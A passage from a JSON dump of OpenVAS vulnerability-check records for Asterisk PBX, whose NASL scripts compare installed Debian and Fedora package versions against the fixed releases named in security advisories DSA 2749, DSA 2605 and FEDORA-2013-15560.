value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2013/dsa-2749.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(6|7)\");\n script_tag(name:\"affected\", value:\"asterisk on Debian Linux\");\n 
script_tag(name:\"solution\", value:\"For the oldstable distribution (squeeze), these problems have been fixed in\nversion 1:1.6.2.9-2+squeeze11.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.8.13.1~dfsg-3+deb7u1.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you upgrade your asterisk packages.\");\n script_tag(name:\"summary\", value:\"Colin Cuthbertson and Walter Doekes discovered two vulnerabilities in\nthe SIP processing code of Asterisk - an open source PBX and telephony\ntoolkit -, which could result in denial of service.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"asterisk\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-config\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-dbg\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-h323\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-sounds-main\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-config\", 
ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-dahdi\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-dbg\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-mobile\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-modules\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-mp3\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-mysql\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-ooh323\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-voicemail\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-voicemail-imapstorage\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-voicemail-odbcstorage\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-07-25T10:51:47", "description": "Check for the Version of asterisk", "cvss3": {}, "published": "2013-09-18T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-15560", "bulletinFamily": 
"scanner", "cvss2": {}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:866890", "href": "http://plugins.openvas.org/nasl.php?oid=866890", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-15560\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(866890);\n script_version(\"$Revision: 6628 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:32:47 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-18 10:07:16 +0530 (Wed, 18 Sep 2013)\");\n script_cve_id(\"CVE-2013-5641\", \"CVE-2013-5642\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-15560\");\n\n tag_insight = \"Asterisk is a complete PBX in software. It runs on Linux and provides\nall of the features you would expect from a PBX and more. 
Asterisk\ndoes voice over IP in three protocols, and can interoperate with\nalmost all standards-based telephony equipment using relatively\ninexpensive hardware.\n\";\n\n tag_affected = \"asterisk on Fedora 19\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2013-15560\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2013-September/115650.html\");\n script_summary(\"Check for the Version of asterisk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~11.5.1~2.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:37:54", "description": "The remote host is missing an update for the 'asterisk' package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2013-09-18T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-15560", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310866890", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310866890", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-15560\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.866890\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-18 10:07:16 +0530 (Wed, 18 Sep 2013)\");\n script_cve_id(\"CVE-2013-5641\", \"CVE-2013-5642\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-15560\");\n\n\n script_tag(name:\"affected\", value:\"asterisk on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", 
value:\"2013-15560\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2013-September/115650.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'asterisk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~11.5.1~2.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-07-24T12:51:52", "description": "Colin Cuthbertson and Walter Doekes discovered two vulnerabilities in\nthe SIP processing code of Asterisk - an open source PBX and telephony\ntoolkit -, which could result in denial of service.", "cvss3": {}, "published": "2013-09-02T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2749-1 (asterisk - several vulnerabilities)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:892749", "href": "http://plugins.openvas.org/nasl.php?oid=892749", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2749.nasl 6611 2017-07-07 12:07:20Z cfischer $\n# Auto-generated from advisory DSA 2749-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are 
largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"asterisk on Debian Linux\";\ntag_insight = \"Asterisk is an Open Source PBX and telephony toolkit. It is, in a\nsense, middleware between Internet and telephony channels on the bottom,\nand Internet and telephony applications at the top.\";\ntag_solution = \"For the oldstable distribution (squeeze), these problems have been fixed in\nversion 1:1.6.2.9-2+squeeze11.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.8.13.1~dfsg-3+deb7u1.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you upgrade your asterisk packages.\";\ntag_summary = \"Colin Cuthbertson and Walter Doekes discovered two vulnerabilities in\nthe SIP processing code of Asterisk - an open source PBX and telephony\ntoolkit -, which could result in denial of service.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(892749);\n script_version(\"$Revision: 6611 $\");\n script_cve_id(\"CVE-2013-5642\", \"CVE-2013-5641\");\n script_name(\"Debian Security Advisory DSA 2749-1 (asterisk - 
several vulnerabilities)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-07 14:07:20 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2013-09-02 00:00:00 +0200 (Mon, 02 Sep 2013)\");\n script_tag(name: \"cvss_base\", value:\"5.0\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2013/dsa-2749.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"asterisk\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-config\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dbg\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-h323\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6.0\")) != 
NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-sounds-main\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-config\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dahdi\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dbg\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-mobile\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-modules\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-mp3\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-mysql\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-ooh323\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-voicemail\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-voicemail-imapstorage\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-voicemail-odbcstorage\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n 
security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:51:55", "description": "Several vulnerabilities were discovered in Asterisk, a PBX and telephony\ntoolkit, that allow remote attackers to perform denial of service\nattacks.", "cvss3": {}, "published": "2013-01-19T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2605-2 (asterisk - several issues)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:892605", "href": "http://plugins.openvas.org/nasl.php?oid=892605", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2605.nasl 6611 2017-07-07 12:07:20Z cfischer $\n# Auto-generated from advisory DSA 2605-2 using nvtgen 1.0\n# Script version: 2.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"asterisk on Debian Linux\";\ntag_insight = \"Asterisk is an Open Source PBX and telephony toolkit. It is, in a\nsense, middleware between Internet and telephony channels on the bottom,\nand Internet and telephony applications at the top.\";\ntag_solution = \"For the stable distribution (squeeze), these problems have been fixed in\nversion 1:1.6.2.9-2+squeeze10.\n\nFor the testing distribution (wheezy) and unstable distribution (sid),\nthese problems will be fixed soon.\n\nWe recommend that you upgrade your asterisk packages.\";\ntag_summary = \"Several vulnerabilities were discovered in Asterisk, a PBX and telephony\ntoolkit, that allow remote attackers to perform denial of service\nattacks.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(892605);\n script_version(\"$Revision: 6611 $\");\n script_cve_id(\"CVE-2012-5977\", \"CVE-2012-5976\");\n script_name(\"Debian Security Advisory DSA 2605-2 (asterisk - several issues)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-07 14:07:20 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2013-01-19 00:00:00 +0100 (Sat, 19 Jan 2013)\");\n script_tag(name: \"cvss_base\", value:\"5.0\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2013/dsa-2605.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n 
script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"asterisk\", ver:\"1:1.6.2.9-2+squeeze10\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-config\", ver:\"1:1.6.2.9-2+squeeze10\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dbg\", ver:\"1:1.6.2.9-2+squeeze10\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1:1.6.2.9-2+squeeze10\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1:1.6.2.9-2+squeeze10\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-h323\", ver:\"1:1.6.2.9-2+squeeze10\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-sounds-main\", ver:\"1:1.6.2.9-2+squeeze10\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:13", "description": "Several vulnerabilities were discovered in Asterisk, a PBX and telephony\ntoolkit, that allow remote attackers to perform denial of service\nattacks.", "cvss3": {}, "published": "2013-01-19T00:00:00", "type": 
"openvas", "title": "Debian Security Advisory DSA 2605-2 (asterisk - several issues)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310892605", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892605", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2605.nasl 14276 2019-03-18 14:43:56Z cfischer $\n# Auto-generated from advisory DSA 2605-2 using nvtgen 1.0\n# Script version: 2.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892605\");\n script_version(\"$Revision: 14276 $\");\n script_cve_id(\"CVE-2012-5977\", \"CVE-2012-5976\");\n script_name(\"Debian Security Advisory DSA 2605-2 (asterisk - several issues)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:43:56 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-19 00:00:00 +0100 (Sat, 19 Jan 2013)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2013/dsa-2605.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB6\");\n script_tag(name:\"affected\", value:\"asterisk on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (squeeze), these problems have been fixed in\nversion 1:1.6.2.9-2+squeeze10.\n\nFor the testing distribution (wheezy) and unstable distribution (sid),\nthese problems will be fixed soon.\n\nWe recommend that you upgrade your asterisk packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities were discovered in Asterisk, a PBX and telephony\ntoolkit, that allow remote attackers to perform denial of service\nattacks.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n 
script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"asterisk\", ver:\"1:1.6.2.9-2+squeeze10\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-config\", ver:\"1:1.6.2.9-2+squeeze10\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-dbg\", ver:\"1:1.6.2.9-2+squeeze10\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1:1.6.2.9-2+squeeze10\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1:1.6.2.9-2+squeeze10\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-h323\", ver:\"1:1.6.2.9-2+squeeze10\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-sounds-main\", ver:\"1:1.6.2.9-2+squeeze10\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:38:25", "description": "The remote host is missing an update for the 'asterisk' package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2013-01-31T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-1003", "bulletinFamily": "scanner", 